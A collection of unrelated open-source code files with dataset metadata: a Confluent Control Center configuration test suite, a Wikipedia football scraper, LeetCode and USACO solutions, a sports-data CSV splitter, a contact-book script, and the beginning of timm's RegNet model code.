Test CONFLUENT_METRICS_TOPIC_REPLICATION should take precedence\n self.set_up_test_env(\n test_env_props=[\n 'CONFLUENT_METRICS_TOPIC_REPLICATION',\n 'CONTROL_CENTER_REPLICATION_FACTOR'\n ]\n )\n\n with patch.dict('os.environ', self.test_env):\n self.fill_template()\n\n # required props show up regardless of if they are configured or not;\n # rf props are part of the required props.\n self.check_filled_template_length(expected_len=len(required_props))\n\n self.check_single_translation(\n c3_prop='confluent.metrics.topic.replication',\n expected_val=self.test_env['CONFLUENT_METRICS_TOPIC_REPLICATION'])\n\n def test_bad_prefix_properties(self):\n \"\"\"\n Testing SET_PROPERTIES_WITH_SKIP_PROP_CHECK's logic of checking bad prefix.\n\n Test that SET_PROPERTIES_WITH_SKIP_PROP_CHECK avoids adding properties that start with\n CONTROL_CENTER_METRICS_ (aka. confluent.controlcenter.metrics.) and those that start with\n CONTROL_CENTER_MONITORING_INTERCEPTOR_ (aka. confluent.controlcenter.monitoring.interceptor.)\n because these properties are special cases and are falsely translated, even though they\n have the regular prefix CONTROL_CENTER_.\n\n :return: pass if SET_PROPERTIES_WITH_SKIP_PROP_CHECK avoids adding properties with bad prefix.\n \"\"\"\n self.set_up_test_env(\n test_env_props=[\n # translated because ok prefix (logic of SET_PROPERTIES_WITH_ENV_TO_PROPS)\n 'CONTROL_CENTER_METRICS_TOPIC',\n # translated because ok prefix but overwritten by the prev prop (logic of SET_PROPERTIES_WITH_ENV_TO_PROPS)\n 'CONFLUENT_METRICS_TOPIC',\n # falsely translated because it starts with CONTROL_CENTER_ but not CONTROL_CENTER_METRIC_ (logic of SET_PROPERTIES_WITH_SKIP_PROP_CHECK)\n 'CONTROL_CENTER_METRIC_TOPIC',\n # won't get translated because bad prefix\n 'CONFLUENT_METRIC_TOPIC',\n ]\n )\n\n with patch.dict('os.environ', self.test_env):\n self.fill_template()\n\n self.check_filled_template_length(expected_len=len(required_props) + 2)\n\n self.check_single_translation(\n c3_prop='confluent.metrics.topic',\n expected_val=self.test_env['CONTROL_CENTER_METRICS_TOPIC'])\n\n self.check_single_translation(\n c3_prop='confluent.controlcenter.metric.topic',\n expected_val=self.test_env['CONTROL_CENTER_METRIC_TOPIC'])\n\n def test_metrics_properties_precedence(self):\n \"\"\"\n Testing SET_PROPERTIES_WITH_ENV_TO_PROPS_WITH_TWO_PREFIXES's logic of precedence.\n\n Test that SET_PROPERTIES_WITH_ENV_TO_PROPS_WITH_TWO_PREFIXES respects the precedence of\n primary_env_prefix >>> secondary_env_prefix, and that the same property is not set twice.\n\n :return: pass if\n - confluent.metrics.topic is only set with CONTROL_CENTER_METRICS_TOPIC. 
We shouldn't\n find it being translated twice.\n - confluent.metrics.topic.partitions is only set with CONTROL_CENTER_METRICS_TOPIC_PARTITIONS\n - confluent.metrics.topic.retention.ms is only set with CONFLUENT_METRICS_TOPIC_RETENTION_MS\n \"\"\"\n self.set_up_test_env(\n test_env_props=[\n # CONTROL_CENTER_METRICS_ takes precedence\n 'CONTROL_CENTER_METRICS_TOPIC',\n 'CONFLUENT_METRICS_TOPIC',\n\n # CONTROL_CENTER_METRICS_ takes precedence\n 'CONTROL_CENTER_METRICS_TOPIC_PARTITIONS',\n\n # CONFLUENT_METRICS_ takes precedence\n 'CONFLUENT_METRICS_TOPIC_RETENTION_MS'\n ]\n )\n\n with patch.dict('os.environ', self.test_env):\n self.fill_template()\n\n self.check_filled_template_length(expected_len=len(required_props) + 3)\n\n self.check_single_translation(\n c3_prop='confluent.metrics.topic',\n expected_val=self.test_env['CONTROL_CENTER_METRICS_TOPIC'])\n\n self.check_single_translation(\n c3_prop='confluent.metrics.topic.partitions',\n expected_val=self.test_env['CONTROL_CENTER_METRICS_TOPIC_PARTITIONS'])\n\n self.check_single_translation(\n c3_prop='confluent.metrics.topic.retention.ms',\n expected_val=self.test_env['CONFLUENT_METRICS_TOPIC_RETENTION_MS'])\n\n def test_comprehensive(self):\n \"\"\"\n Testing SET_PROPERTIES, SET_PROPERTIES_WITH_ENV_TO_PROPS, and\n SET_PROPERTIES_WITH_SKIP_PROP_CHECK 's logic combined.\n\n Test the properties translation comprehensively.\n\n :return: pass if all properties' translation and precedence are correct\n \"\"\"\n # rf props should ignore \"CONTROL_CENTER_REPLICATION_FACTOR\" because of precedence\n configured_rf_props = list(rf_props.keys()) + [\"CONTROL_CENTER_REPLICATION_FACTOR\"]\n\n # metrics props should ignore \"CONFLUENT_METRICS_*\" because of precedence\n configured_metrics_props = list(control_center_metrics_props.keys()) + \\\n list(confluent_metrics_props.keys())\n\n # monitoring props should be partially set because they're optional props\n configured_monitoring_props, _ = self.configure_partially(monitoring_props)\n\n # other props should ignore \"CONTROL_CENTER_CONFLUENT_LICENSE\" because of precedence and\n # should be partially set because they're optional props\n configured_other_props = list(special_props.keys()) + [\"CONTROL_CENTER_CONFLUENT_LICENSE\"]\n\n # c3 optional props should be partially set because they're optional props\n configured_c3_optional_props, _ = self.configure_partially(c3_optional_props)\n\n # metadata props should be partially set because they're optional props\n configured_metadata_props, _ = self.configure_partially(metadata_props)\n\n # support props should be partially set because they're optional props\n configured_support_props, _ = self.configure_partially(support_props)\n\n self.set_up_test_env(test_env_props=list(basic_props.keys()) +\n configured_rf_props +\n configured_metrics_props +\n configured_monitoring_props +\n configured_other_props +\n configured_c3_optional_props +\n configured_metadata_props +\n configured_support_props)\n\n with patch.dict('os.environ', self.test_env):\n self.fill_template()\n\n to_check = [basic_props.keys(),\n rf_props.keys(),\n control_center_metrics_props.keys(),\n configured_monitoring_props,\n special_props,\n configured_c3_optional_props,\n configured_metadata_props,\n configured_support_props]\n\n self.check_filled_template_length(expected_len=sum([len(li) for li in to_check]))\n\n for li in to_check:\n self.check_translations(env_props=li)\n\n def test_comprehensive_concrete_example(self):\n self.set_up_test_env(\n test_env_props=[\n # copied from 
cp-all-in-one\n 'CONTROL_CENTER_BOOTSTRAP_SERVERS',\n 'CONTROL_CENTER_KSQL_KSQLDB1_URL',\n 'CONTROL_CENTER_KSQL_KSQLDB1_ADVERTISED_URL',\n 'CONTROL_CENTER_SCHEMA_REGISTRY_URL',\n 'CONTROL_CENTER_SCHEMA_REGISTRY_BASIC_AUTH_CREDENTIALS_SOURCE',\n 'CONTROL_CENTER_SCHEMA_REGISTRY_BASIC_AUTH_USER_INFO',\n 'CONTROL_CENTER_CONNECT_CONNECT-DEFAULT_CLUSTER',\n 'CONTROL_CENTER_STREAMS_SECURITY_PROTOCOL',\n 'CONTROL_CENTER_STREAMS_SASL_JAAS_CONFIG',\n 'CONTROL_CENTER_STREAMS_SASL_MECHANISM',\n 'CONTROL_CENTER_REPLICATION_FACTOR',\n 'CONTROL_CENTER_MONITORING_INTERCEPTOR_TOPIC_REPLICATION',\n 'CONTROL_CENTER_INTERNAL_TOPICS_REPLICATION',\n 'CONTROL_CENTER_COMMAND_TOPIC_REPLICATION',\n 'CONTROL_CENTER_METRICS_TOPIC_REPLICATION',\n 'CONFLUENT_METRICS_TOPIC_REPLICATION',\n 'CONTROL_CENTER_STREAMS_NUM_STREAM_THREADS',\n 'CONTROL_CENTER_INTERNAL_TOPICS_PARTITIONS',\n 'CONTROL_CENTER_MONITORING_INTERCEPTOR_TOPIC_PARTITIONS',\n 'CONTROL_CENTER_METRICS_TOPIC_MAX_MESSAGE_BYTES',\n\n # special props\n 'CONFIG_PROVIDERS',\n 'CONFIG_PROVIDERS_SECUREPASS_CLASS',\n 'CONTROL_CENTER_LICENSE',\n 'CONTROL_CENTER_CONFLUENT_LICENSE',\n 'PUBLIC_KEY_PATH',\n\n # props with bad prefix\n 'CONTROL_CENTER_METRIC_TOPIC',\n 'CONTROL_CENTER_MONITORING_TOPIC',\n\n # metrics topic precedence\n 'CONTROL_CENTER_METRICS_TOPIC_RETENTION_MS',\n 'CONFLUENT_METRICS_TOPIC_RETENTION_MS'\n ]\n )\n with patch.dict('os.environ', self.test_env):\n self.fill_template()\n\n self.check_filled_template_length(expected_len=25)\n\n # copied from cp-all-in-one\n self.check_single_translation(\n c3_prop='bootstrap.servers',\n expected_val=self.test_env['CONTROL_CENTER_BOOTSTRAP_SERVERS'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.ksql.ksqldb1.url',\n expected_val=self.test_env['CONTROL_CENTER_KSQL_KSQLDB1_URL'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.ksql.ksqldb1.advertised.url',\n expected_val=self.test_env['CONTROL_CENTER_KSQL_KSQLDB1_ADVERTISED_URL'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.schema.registry.url',\n expected_val=self.test_env['CONTROL_CENTER_SCHEMA_REGISTRY_URL'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.schema.registry.basic.auth.credentials.source',\n expected_val=self.test_env['CONTROL_CENTER_SCHEMA_REGISTRY_BASIC_AUTH_CREDENTIALS_SOURCE'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.schema.registry.basic.auth.user.info',\n expected_val=self.test_env['CONTROL_CENTER_SCHEMA_REGISTRY_BASIC_AUTH_USER_INFO'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.connect.connect-default.cluster',\n expected_val=self.test_env['CONTROL_CENTER_CONNECT_CONNECT-DEFAULT_CLUSTER'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.streams.security.protocol',\n expected_val=self.test_env['CONTROL_CENTER_STREAMS_SECURITY_PROTOCOL'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.streams.sasl.jaas.config',\n expected_val=self.test_env['CONTROL_CENTER_STREAMS_SASL_JAAS_CONFIG'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.streams.sasl.mechanism',\n expected_val=self.test_env['CONTROL_CENTER_STREAMS_SASL_MECHANISM'])\n self.check_single_translation(\n c3_prop='confluent.monitoring.interceptor.topic.replication',\n expected_val=self.test_env['CONTROL_CENTER_MONITORING_INTERCEPTOR_TOPIC_REPLICATION'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.internal.topics.replication',\n 
expected_val=self.test_env['CONTROL_CENTER_INTERNAL_TOPICS_REPLICATION'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.command.topic.replication',\n expected_val=self.test_env['CONTROL_CENTER_COMMAND_TOPIC_REPLICATION'])\n self.check_single_translation(\n c3_prop='confluent.metrics.topic.replication',\n expected_val=self.test_env['CONTROL_CENTER_METRICS_TOPIC_REPLICATION'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.streams.num.stream.threads',\n expected_val=self.test_env['CONTROL_CENTER_STREAMS_NUM_STREAM_THREADS'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.internal.topics.partitions',\n expected_val=self.test_env['CONTROL_CENTER_INTERNAL_TOPICS_PARTITIONS'])\n self.check_single_translation(\n c3_prop='confluent.monitoring.interceptor.topic.partitions',\n expected_val=self.test_env['CONTROL_CENTER_MONITORING_INTERCEPTOR_TOPIC_PARTITIONS'])\n self.check_single_translation(\n c3_prop='confluent.metrics.topic.max.message.bytes',\n expected_val=self.test_env['CONTROL_CENTER_METRICS_TOPIC_MAX_MESSAGE_BYTES'])\n\n # special props\n self.check_single_translation(\n c3_prop='config.providers',\n expected_val=self.test_env['CONFIG_PROVIDERS'])\n self.check_single_translation(\n c3_prop='config.providers.securepass.class',\n expected_val=self.test_env['CONFIG_PROVIDERS_SECUREPASS_CLASS'])\n self.check_single_translation(\n c3_prop='confluent.license',\n expected_val=self.test_env['CONTROL_CENTER_LICENSE'])\n self.check_single_translation(\n c3_prop='public.key.path',\n expected_val=self.test_env['PUBLIC_KEY_PATH'])\n\n # props with bad prefix\n self.check_single_translation(\n c3_prop='confluent.controlcenter.metric.topic',\n expected_val=self.test_env['CONTROL_CENTER_METRIC_TOPIC'])\n self.check_single_translation(\n c3_prop='confluent.controlcenter.monitoring.topic',\n expected_val=self.test_env['CONTROL_CENTER_MONITORING_TOPIC'])\n\n # metrics topic precedence\n self.check_single_translation(\n c3_prop='confluent.metrics.topic.retention.ms',\n expected_val=self.test_env['CONTROL_CENTER_METRICS_TOPIC_RETENTION_MS'])\n\n # required props that weren't configured get empty string\n self.check_single_translation(\n c3_prop='confluent.controlcenter.data.dir',\n expected_val=\"\")\n self.check_single_translation(\n c3_prop='zookeeper.connect',\n expected_val=\"\")\n","repo_name":"confluentinc/control-center-images","sub_path":"control-center/test/test_control_center_props_validation.py","file_name":"test_control_center_props_validation.py","file_ext":"py","file_size_in_byte":27336,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"76"} +{"seq_id":"75058256884","text":"\nimport sys\nimport requests\nfrom bs4 import element\nfrom bs4 import BeautifulSoup\nfrom typing import List\nimport re\nfrom unicodedata import normalize\nleagues = {'EPL':2000,'LaLiga':2000,'Bundesliga':2000,'Serie A':2000}\n\n\n\n\n\ndef BuildLink(league: str, year: int)->str:\n if league == 'EPL':\n if year>2006:\n return \"https://en.wikipedia.org/wiki/\"+str(year)+'-'+str(year+1)[-2:]+\"_Premier_League\"\n elif year<=2006 and year>=1992:\n return \"https://en.wikipedia.org/wiki/\"+str(year)+'-'+str(year+1)[-2:]+\"_FA_Premier_League\"\n else:\n raise Exception(\"Sorry that year is not in record\")\n elif league == 'LaLiga':\n if year == 1999:\n return \"https://en.wikipedia.org/wiki/1999-2000_La_Liga\"\n elif year>=1997:\n return \"https://en.wikipedia.org/wiki/\"+str(year)+'-'+str(year+1)[-2:] +\"_La_Liga\"\n 
raise Exception(\"Sorry that year is not in record\")\n elif league == 'Bundesliga':\n if year == 1999:\n return \"https://en.wikipedia.org/wiki/1999-2000_Bundesliga\"\n if year>=1963:\n return \"https://en.wikipedia.org/wiki/\"+str(year)+'-'+str(year+1)[-2:] +\"_Bundesliga\"\n elif league == 'Serie A':\n if year>= 1955:\n return \"https://en.wikipedia.org/wiki/\"+str(year)+'-'+str(year+1)[-2:] +\"_Serie_A\"\n raise Exception(\"Sorry, this leagues is not supported? Try using on of these:\",leagues)\ndef GetTeams(teams: List[element.Tag] )->List[str]: #takes in a soup element tag( i.e the table) and gets all the teams an returns it in a list\n teamNames = []\n for i in range(len(teams)):\n if i==0:\n continue\n if teams[i].find(\"th\").find(\"a\") is None:\n teamNames += [\" \".join( teams[i].find(\"th\").get_text(strip=True).replace('\\n','').replace(u'\\xa0',u' ').split())]\n else:\n teamNames += [ \" \".join( teams[i].find(\"th\").find(\"a\").get_text(strip=True).replace('\\n', '').replace(u'\\xa0',u' ').split())]\n #\\xa0 is caused by an error in 2016 LaLiga!\n print(teamNames)\n return teamNames\ndef BreakDownTable(teams : List[element.Tag] ) -> dict:\n Games = {} # performance by dict with keys are the team name and the value is a list of home games\n teamNames = GetTeams(teams)#gets team names\n for i in range(len(teams)):#goes through the rows of table\n if i==0:#ignore the first one since it just has the team names that are shortended\n continue\n\n if teams[i].find(\"th\").find(\"a\") is None:\n teamName = \" \".join( teams[i].find(\"th\").get_text(strip=True).replace('\\n','').replace(u'\\xa0',u' ').split())\n else:\n teamName = \" \".join(teams[i].find(\"th\").find(\"a\").get_text(strip=True).replace('\\n', '').replace(u'\\xa0',u' ').split())# get the team name\n Games[teamName] = []# make a list of all the games played at home\n j=0\n for game in teams[i].find_all('td'):\n if re.compile(\"\\d+\").match(game.text.replace('\\n', '')):\n awayTeam = teamNames[j].replace('\\n', '')\n res = ''.join(c for c in game.text[:-1] if c.isdigit() or c=='–')\n Games[teamName] += [(res,awayTeam)]# added with score string then away team\n j+=1\n\n return Games\ndef GetGames(league,season):\n targetLeague = league\n targetSeason = season\n page = requests.get(BuildLink(targetLeague,targetSeason))\n\n soup = BeautifulSoup(page.content, 'html.parser')\n table = soup.find(\"table\", class_=\"wikitable plainrowheaders\")\n L = BreakDownTable(table.find_all('tr') )\n #print(L)\n return L\nif __name__ == \"__main__\":\n targetLeague = sys.argv[1]\n targetSeason = int(sys.argv[2])\n page = requests.get(BuildLink(targetLeague,targetSeason))\n\n soup = BeautifulSoup(page.content, 'html.parser')\n table = soup.find(\"table\", class_=\"wikitable plainrowheaders\")\n\n print(BreakDownTable(table.find_all('tr') ) )\n","repo_name":"jom9/footballelo","sub_path":"set_data/scrapeSeason.py","file_name":"scrapeSeason.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15615594599","text":"class Solution(object):\n def maxProfit(self, prices):\n \"\"\"\n :type prices: List[int]\n :rtype: int\n \"\"\"\n #finding the lowest valley followed by the highest peak (biggest difference)\n min_price = float('inf')\n max_profit = 0\n \n #iterate through prices array \n for i in range(len(prices)):\n #if the current price is lower than the min price then update min_price\n if prices[i] < min_price:\n min_price = prices[i]\n 
#if the current profit is higher than max profit so far update max_profit\n elif prices[i] - min_price > max_profit:\n max_profit = prices[i] - min_price\n \n return max_profit\n","repo_name":"jjjustyn/leetcode-solutions","sub_path":"121_Best_Time_to_Buy_and_Sell_Stock.py","file_name":"121_Best_Time_to_Buy_and_Sell_Stock.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12829050434","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport os\nimport heapq\n\ndirs = os.listdir(\"C:/Users/Administrator/Desktop/WSY_data/origin\")\nfor all_files in dirs:\n # 读取原始数据\n file = \"C:/Users/Administrator/Desktop/WSY_data/origin/\" + all_files + \"\"\n OLC1 = pd.read_csv(file)\n OLC2 = pd.read_csv(file)\n OLC1[\"VBT\"][OLC1[\"VBT\"] <= 0.05] = 0 # 向心补零\n OLC2[\"VBT\"][OLC2[\"VBT\"] >= -0.05] = 0 # 向心补零\n OLC2[OLC2 >= -0.05] = 0 # 离心补零\n\n OLC1[\"VBT\"] = OLC1[\"VBT\"][OLC1[\"VBT\"] >= 0.05] # 向心\n OLC2[\"VBT\"] = OLC2[\"VBT\"][OLC2[\"VBT\"] <= -0.05] # 向心\n # OLC2 = OLC2[OLC2 <= -0.05] # 离心\n plt.figure(1)\n # plt.plot(OLC1['y'], linewidth=0.4, color='blue', label='OPTI')\n plt.plot(OLC1['VBT'], linewidth=0.4, color='red', label='VBT')\n plt.show()\n # plt.figure(2)\n # plt.plot(OLC2['y'], linewidth=0.4, color='blue', label='OPTI')\n plt.plot(OLC2['VBT'], linewidth=0.4, color='blue', label='VBT')\n plt.show()\n\n centric = pd.DataFrame()\n eccentric = pd.DataFrame()\n centric[\"Opti\"] = OLC1[\"Opti\"]\n centric[\"VBT\"] = OLC1[\"VBT\"]\n eccentric[\"Opti\"] = OLC2[\"Opti\"]\n eccentric[\"VBT\"] = OLC2[\"VBT\"]\n\n # print(OLC)\n\n centric.to_csv(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\WSY_data\\\\concentric\\\\\" + all_files + \"\", index=False)\n eccentric.to_csv(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\WSY_data\\\\eccentric\\\\\" + all_files + \"\", index=False)\n # OLC2.to_csv(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\OLC\\\\%rm\\\\75%B\\\\\" + all_files + \"\", index=False)\n","repo_name":"Logan9872/Velocity_Based_Training_Data_Process","sub_path":"WSY/向心离心阶段分离.py","file_name":"向心离心阶段分离.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33661634382","text":"\"\"\"\nID: wrwwctb1\nLANG: PYTHON3\nTASK: hidden\n5.5.2\n\nkey idea\n\ncyclic => concat 2 copies\n\nprerequisite:\none (not the best) way to test if two strings are cyclic shifts of each other\nref: https://jim-think.blogspot.com/2012/07/usaco-hidden-password.html\nimplementation: isCyclicShifts2\nexplanation:\nsuppose s1 and s2 are cyclic shifts of each other. suppose sm is the min cyclic\nshift of both. suppose M(s1) is the min start loc of sm in s1. M(s2) defined\nsimilarly. i/j points at s1/s2. maintain invariant: i <= M(s1) and j <= M(s2).\nat some i j, we find the first k >= 0 s.t s1[i+k] != s2[j+k]. if s1 and s2\nremains the same even if k reaches L, we found the cyclic match. otherwise,\nsuppose s2[j+k] > s1[i+k]. this guarantees that M(s2) cannot be in [j, j+k].\nthis allows us to advance j by k + 1.\n\nback to usaco hidden:\nconcat input by itself. compare it with itself using the algo above, but never\nallows i == j (or else we simply find that the string matches itself.) once i\nor j lands on M(s), the other will be pushed to L or beyond.\n\n\n\n\n\n\nn^2 methods:\n brute force: concat. strncmp L. 
can pass with c\n ring linked list, compare every shift (constant shift, linear compare)\n stock span, weed out suboptimal (consider 'ab'* 50000)\n\nusaco linear sol is complicated\ns = original str\nss = original str concat 2 copies\nv[i] = k:\n for all substrings ss[i:i+length],\n k is the longest length s.t. ss[i:i+k] is the smallest among all ss's substrings of length k\n\"\"\"\n\nimport os, sys, re, time\nfrom collections import Counter, deque, defaultdict\nfrom queue import Queue\nfrom copy import copy, deepcopy\nfrom itertools import combinations, permutations, accumulate, \\\n combinations_with_replacement\nfrom functools import lru_cache, cmp_to_key, partial as functools_partial\nfrom heapq import heappush, heappop, nlargest, nsmallest\nfrom bisect import bisect_left, bisect_right\nfrom math import ceil, floor, factorial, gcd, modf, log, log2, log10, sqrt, \\\n pi, sin, cos, tan, asin, acos, atan, atan2, hypot, erf, erfc, inf, nan\n# sys.setrecursionlimit(5782)\n# python -m cProfile -s time ha.py\n\nprint = functools_partial(print, flush=True)\ninput = lambda: fin.readline().strip('\\n')\n\ndef printwrite(string):\n print(string)\n fout.write(str(string) + '\\n')\n\nfilename = 'hidden'\nfin = open(filename + '.in', 'r')\nfout = open(filename + '.out', 'w')\n\n\n\n\n\n\n\n'''\ndef isCyclicShifts2(s1, s2):\n L = len(s1)\n if len(s2) != L:\n return False\n if L == 0:\n return True\n s1 = s1 + s1\n s2 = s2 + s2\n i = 0\n j = 0\n while i < L and j < L:\n # find first difference\n k = 0\n while k < L and s1[i + k] == s2[j + k]: # i + k, j + k always < 2L\n k += 1\n # found the cyclic match\n if k == L:\n return True\n # advance\n if s1[i + k] < s2[j + k]:\n j += k + 1\n else:\n i += k + 1\n return False\n\ndef isCyclicShifts1(s1, s2):\n L = len(s1)\n if len(s2) != L:\n return False\n s2 = s2 + s2\n return s2.find(s1) != -1\n'''\n\nL = int(input())\nchs = []\nwhile True:\n line = input()\n if line == '':\n break\n chs.extend([ch for ch in line])\n\nchs = ''.join(chs + chs)\n\ni = 0\nj = 1\nwhile i < L and j < L:\n # find first difference\n k = 0\n while k < L and chs[i + k] == chs[j + k]: # i + k, j + k always < 2L\n k += 1\n # iff chs is uniform\n if k == L:\n break\n # advance\n if chs[i + k] < chs[j + k]:\n j += k + 1\n else:\n i += k + 1\n # never start at same place\n if i == j:\n j += 1\n\nprintwrite(min(i, j))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nfin.close()\nfout.close()\ndel print, input\n\n","repo_name":"wrwwctb/USACO","sub_path":"hidden.py","file_name":"hidden.py","file_ext":"py","file_size_in_byte":3689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39366806887","text":"dic = {}\ndef agregar_contacto(nombre):\n\n apellido = input('Ingresa apellido: ')\n cell = input('Ingresa celular: ')\n correo = input('Ingresa correo: ')\n dic[nombre] = [apellido, cell, correo]\n\ndef buscar_contacto(nombre):\n \n if nombre in dic:\n print(dic[nombre])\n else:\n print('Contacto no encontrado!')\n\ndef eliminar_contacto(nombre):\n \n dic.pop(nombre)\n mostrar_contacto()\n\ndef mostrar_contacto():\n\n print('Contactos: ')\n for position, key in enumerate(dic):\n print(position + 1, key, dic[key])\nwhile True:\n print('***Menu***')\n print('1) Añadir contacto')\n print('2) Eliminar contacto')\n print('3) Mostrar contactos')\n print('4) Buscar contactos')\n print('5) Salir')\n number = int(input('Ingrese un numero para elegir una opcion: '))\n if number == 5:\n break\n elif number != 1 and number != 2 and number != 3 and number != 4:\n 
print('Error! Escoja una opcion valida')\n else:\n if number == 1:\n nombre = input('Ingresa Nombre: ')\n agregar_contacto(nombre)\n elif number == 2:\n nombre = input('Ingresa Nombre: ')\n elif number == 3:\n mostrar_contacto()\n else:\n nombre = input('Ingresa Nombre: ')\n buscar_contacto","repo_name":"Hiteek/Hello_world_in_python","sub_path":"agenda.py","file_name":"agenda.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2757429501","text":"import math\nfrom dataclasses import dataclass, replace\nfrom functools import partial\nfrom typing import Optional, Union, Callable\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\nfrom timm.data import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD\nfrom timm.layers import ClassifierHead, AvgPool2dSame, ConvNormAct, SEModule, DropPath, GroupNormAct\nfrom timm.layers import get_act_layer, get_norm_act_layer, create_conv2d, make_divisible\nfrom ._builder import build_model_with_cfg\nfrom ._manipulate import checkpoint_seq, named_apply\nfrom ._registry import generate_default_cfgs, register_model, register_model_deprecations\n\n__all__ = ['RegNet', 'RegNetCfg'] # model_registry will add each entrypoint fn to this\n\n\n@dataclass\nclass RegNetCfg:\n depth: int = 21\n w0: int = 80\n wa: float = 42.63\n wm: float = 2.66\n group_size: int = 24\n bottle_ratio: float = 1.\n se_ratio: float = 0.\n group_min_ratio: float = 0.\n stem_width: int = 32\n downsample: Optional[str] = 'conv1x1'\n linear_out: bool = False\n preact: bool = False\n num_features: int = 0\n act_layer: Union[str, Callable] = 'relu'\n norm_layer: Union[str, Callable] = 'batchnorm'\n\n\ndef quantize_float(f, q):\n \"\"\"Converts a float to the closest non-zero int divisible by q.\"\"\"\n return int(round(f / q) * q)\n\n\ndef adjust_widths_groups_comp(widths, bottle_ratios, groups, min_ratio=0.):\n \"\"\"Adjusts the compatibility of widths and groups.\"\"\"\n bottleneck_widths = [int(w * b) for w, b in zip(widths, bottle_ratios)]\n groups = [min(g, w_bot) for g, w_bot in zip(groups, bottleneck_widths)]\n if min_ratio:\n # torchvision uses a different rounding scheme for ensuring bottleneck widths divisible by group widths\n bottleneck_widths = [make_divisible(w_bot, g, min_ratio) for w_bot, g in zip(bottleneck_widths, groups)]\n else:\n bottleneck_widths = [quantize_float(w_bot, g) for w_bot, g in zip(bottleneck_widths, groups)]\n widths = [int(w_bot / b) for w_bot, b in zip(bottleneck_widths, bottle_ratios)]\n return widths, groups\n\n\ndef generate_regnet(width_slope, width_initial, width_mult, depth, group_size, quant=8):\n \"\"\"Generates per block widths from RegNet parameters.\"\"\"\n assert width_slope >= 0 and width_initial > 0 and width_mult > 1 and width_initial % quant == 0\n # TODO dWr scaling?\n # depth = int(depth * (scale ** 0.1))\n # width_scale = scale ** 0.4 # dWr scale, exp 0.8 / 2, applied to both group and layer widths\n widths_cont = np.arange(depth) * width_slope + width_initial\n width_exps = np.round(np.log(widths_cont / width_initial) / np.log(width_mult))\n widths = np.round(np.divide(width_initial * np.power(width_mult, width_exps), quant)) * quant\n num_stages, max_stage = len(np.unique(widths)), width_exps.max() + 1\n groups = np.array([group_size for _ in range(num_stages)])\n return widths.astype(int).tolist(), num_stages, groups.astype(int).tolist()\n\n\ndef downsample_conv(\n in_chs,\n out_chs,\n kernel_size=1,\n stride=1,\n dilation=1,\n 
norm_layer=None,\n preact=False,\n):\n norm_layer = norm_layer or nn.BatchNorm2d\n kernel_size = 1 if stride == 1 and dilation == 1 else kernel_size\n dilation = dilation if kernel_size > 1 else 1\n if preact:\n return create_conv2d(\n in_chs,\n out_chs,\n kernel_size,\n stride=stride,\n dilation=dilation,\n )\n else:\n return ConvNormAct(\n in_chs,\n out_chs,\n kernel_size,\n stride=stride,\n dilation=dilation,\n norm_layer=norm_layer,\n apply_act=False,\n )\n\n\ndef downsample_avg(\n in_chs,\n out_chs,\n kernel_size=1,\n stride=1,\n dilation=1,\n norm_layer=None,\n preact=False,\n):\n \"\"\" AvgPool Downsampling as in 'D' ResNet variants. This is not in RegNet space but I might experiment.\"\"\"\n norm_layer = norm_layer or nn.BatchNorm2d\n avg_stride = stride if dilation == 1 else 1\n pool = nn.Identity()\n if stride > 1 or dilation > 1:\n avg_pool_fn = AvgPool2dSame if avg_stride == 1 and dilation > 1 else nn.AvgPool2d\n pool = avg_pool_fn(2, avg_stride, ceil_mode=True, count_include_pad=False)\n if preact:\n conv = create_conv2d(in_chs, out_chs, 1, stride=1)\n else:\n conv = ConvNormAct(in_chs, out_chs, 1, stride=1, norm_layer=norm_layer, apply_act=False)\n return nn.Sequential(*[pool, conv])\n\n\ndef create_shortcut(\n downsample_type,\n in_chs,\n out_chs,\n kernel_size,\n stride,\n dilation=(1, 1),\n norm_layer=None,\n preact=False,\n):\n assert downsample_type in ('avg', 'conv1x1', '', None)\n if in_chs != out_chs or stride != 1 or dilation[0] != dilation[1]:\n dargs = dict(stride=stride, dilation=dilation[0], norm_layer=norm_layer, preact=preact)\n if not downsample_type:\n return None # no shortcut, no downsample\n elif downsample_type == 'avg':\n return downsample_avg(in_chs, out_chs, **dargs)\n else:\n return downsample_conv(in_chs, out_chs, kernel_size=kernel_size, **dargs)\n else:\n return nn.Identity() # identity shortcut (no downsample)\n\n\nclass Bottleneck(nn.Module):\n \"\"\" RegNet Bottleneck\n\n This is almost exactly the same as a ResNet Bottlneck. The main difference is the SE block is moved from\n after conv3 to after conv2. 
